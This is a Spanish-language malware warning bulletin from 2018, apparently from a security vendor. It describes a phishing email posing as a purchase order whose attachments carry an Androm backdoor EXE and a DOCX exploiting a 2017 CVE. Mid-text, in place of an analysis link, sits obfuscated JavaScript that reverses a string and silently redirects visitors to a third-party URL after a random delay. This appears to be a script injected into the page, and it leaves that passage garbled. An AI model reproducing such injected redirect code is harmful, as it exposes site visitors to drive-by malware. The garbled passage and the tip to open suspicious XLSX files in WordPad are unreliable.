MAIL CON ANEXADO MALICIOSO ZIP QUE CONTIENE EXE MALWARE y OTRO DOCX CON EXPLOIT CVE-2017

Se está recibiendo un mail anexando un fichero ZIP que contiene un EXE con Backdoor Androm y yn DOCX con exploit CVE-2017

El texto del mail es el siguiente:
_____________________________

Asunto: PO476733824/Sample list
De: “\”Marta R. Ariño\” <>””destinatario”
Fecha: 16/11/2018 14:10
Para: Recipients <>

Good day,

We got information about your products from our Asia based agent.
Kindly check attached product list which we need from your company.

Please confirm availability and/or time of production and quote your
lowest price for our confirmation.

Also note that item #132 and item #135 is needed in large quantity so be kind to give us your best discount.

Please confirm the PO 476733824

Best regards

Marta R. Ariño
CFI Gen Trade co. ltd
17F, no.33 Sec. 1, Minsheng Rd.(Taiwan)
Banqiao Dist., New Taipei City 22069,
ROC tel: 886-2-2957-9823
Fax:886-2-2957-9712

ANEXADOS:  FICHERO ZIP  Y FICHERO DOCX  (ambos maliciosos)

__________

El fichero EXE contenido en el ZIP $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/217dac08a4ed5b40416556ce691b3b1c2bd7f86597eb215afeab8bf3ad0fefad/analysis/1542626999/” target=”_blank” rel=”noopener”> este otro>

que contiene un Exploit CVE 2017.

En cualquier caso los dos son indeseables, y no deben ejecutarse !!!

Aparte, recordar:

COMO YA VAMOS INDICANDO REPETIDAMENTE, NO SE DEBEN EJECUTAR NI FICHEROS NI ENLACES NI IMAGENES QUE NO SE HAYAN SOLICITADO, AUNQUE SE CONOZCA EL REMITENTE O VENGAN DE ALGUNA ENTIDAD CONOCIDA, Y MENOS ENVIAR DATOS QUE PUDIERAN SOLICITAR …

Y CUIDADO, QUE AHORA YA NOS LLEGAN CON TODO EL MAIL EN UNA IMAGEN QUE ES UN ENLACE A UNA URL ACORTADA MALICIOSA, ASI QUE DESDE AHORA, SEGUIR LO INDICADO ANTERIORMENTE, AÑADIENDO NO PULSAR EN NINGUNA PARTE DEL MAIL, POR SI ACASO FUERA TODO ÉL UNA IMAGEN CON ENLACE A URL MALICIOSA !!!

y en particular con los XLSX anexados a mails no solicitados, no abrirlos con el Microsoft Office, sino con el WordPad, dado que no son realmente ficheros de Excel sino simples RTF con exploit similar al CV-2017, que con el WordPad no actúa.

Esperamos que este aviso les sea de utilidad

saludos

ms, 19-11-2018 [/B]